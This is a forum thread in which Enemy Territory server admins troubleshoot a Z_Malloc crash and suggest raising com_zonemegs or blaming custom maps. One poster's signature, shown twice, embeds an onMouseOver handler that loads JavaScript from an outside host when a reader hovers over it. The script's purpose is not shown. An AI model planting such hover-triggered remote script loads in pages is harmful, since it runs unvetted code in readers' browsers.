Server Crash Error code within!

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

Balthazar

Server Crash Error code within!

Post by Balthazar »

Hey guys I have been having problems as I stated before but I seem to have found the error code that may help me fix this problem. Here is what I get from the server window when the server crashes...

Z_Malloc failed on allocation of 32832 bits from the main zone.

Can anyone help me with this so I can stop the server from crashing.
=FF=im2good4u

Post by =FF=im2good4u »

now look wut you did you broke it
Balthazar

Post by Balthazar »

man that helps alot thanks dude, I will use that when something breaks from now on...lol

j/k :D

any one have any ideas as to what causes this or a fix for it?
Balthazar

Post by Balthazar »

anybody here ever seen this?

I know someone has to have had this problem.

Again here is the error message I get on the server window when it crashes...

Z_Malloc failed on allocation of 32832 bits from the main zone.
Rain

Post by Rain »

Try increasing com_zonemegs on the server.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Balthazar

Post by Balthazar »

Rain I really appreciate your reply man, but Im a noob and I have no idea as to how to do this so a detailed explanation would be very helpful to me if you dont mind.

Thanks again
Threshold

Post by Threshold »

Balthazar wrote:Rain I really appreciate your reply man, but Im a noob and I have no idea as to how to do this so a detailed explanation would be very helpful to me if you dont mind.

Thanks again
In the server config find

com_hunkmegs and change the size. This is is the amount of ram that it uses.

seta com_hunkmegs "256"

Find what it is setup for and bump it up 32 or 64 megs. Of course this all depends on how much ram the server has. With Hunkmegs and Sound you don't want to go over 75% of total ram on the box.

Correct me if Im wrong anyone?
Rain

Post by Rain »

You're on the right track, but I really did mean com_zonemegs (it's a different memory allocation pool.)

So, basically, either:
  • Edit your configuration and change 'seta com_zoneMegs "24"' (or whatever) to 'seta com_zoneMegs "32"' (or whatever), or
  • Add '+set com_zoneMegs 32' (or whatever) to your server command line
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
KingJackaL

Post by KingJackaL »

Is this a result of the new scripts included with ET Pro? Should admins be setting zonemegs up as a matter of course? ( I know there's at least 1 custom map that reccomends doing so for its scripts in its readme, but I don't host that map ) Will we know more in a few days/weeks? :)
Rain

Post by Rain »

I haven't had any problems running with the defaults, and this is the first I've heard of anyone else having any problems. Could be something to do with a custom map, I don't know.
Kamel

Post by Kamel »

through lots of testing with custom map scripts turned on and so on, i haven't ever had this problem.

because of this, i don't think it's a product of etpro, but probably just a large custom map.

i know raiders of the lost arc (or whatever the heck it's called) requires you to bump your ram allocation, so it was most likely a custom map you were running.

that's my guess anyway, there are no mapscripts that etpro comes with that changes anything on a modified map, so if it works for one person it should work for everyone (assuming default values that is).
"Common sense isn't very common."
Balthazar

Post by Balthazar »

well I do run custom maps but even before I got into the custom maps I had this problem with the standard maps that comes with ET.

Ex. Radar, Fuel Dump, Goldrush...ect...ect..
duke'ku

Post by duke'ku »

Kamel wrote:i know raiders of the lost arc (or whatever the heck it's called) requires you to bump your ram allocation, so it was most likely a custom map you were running.
that problem was fixed before the final release.
Balthazar

Post by Balthazar »

well i added the two commands you guys suggested and the server still crashes after about 4 hours of playing.

man this is crazy, i have a 6,000 server that will run anything except for this damn free game... I wonder if the source where I downloaded the game from has a currupt file or something causing this. I got it from 3dgamers.com I believe.

Man if anybody can help me with this I will owe you huge!

Just to let ya know here is what I am running....

Dual Intel Xeon TM Processor 2.8GHz 533MHz 604pin .13u 512KB
Supermicro X5DAE Intel E7505 Dual Xeon DDR E-ATX Server Board w/Gigabit LAN
T1 Internet Connection
2 - ATP 1GB DDR266 PC2100 ECC Registered Memory
2 - Maxtor Atlas(TM) 10K III KU073L8 73.4GB 68pin U320-SCSI 10,000RPM Wide-LVD Hard Drive (Running Raid Zer0)
ATI - 9700 ALL-In-Wonder-Pro 128ddr
Windows 2000 Pro.
Sound Blaster Audigy 2 ZS Platinum Pro

I checked Windows for any erros on this problem with this Z_Malloc and I found nothing so it has to do with the server or the game itsself.
tiroloco

Post by tiroloco »

Do you use a lot of "sets" variables in your *.cfg file? If so, try to delete them.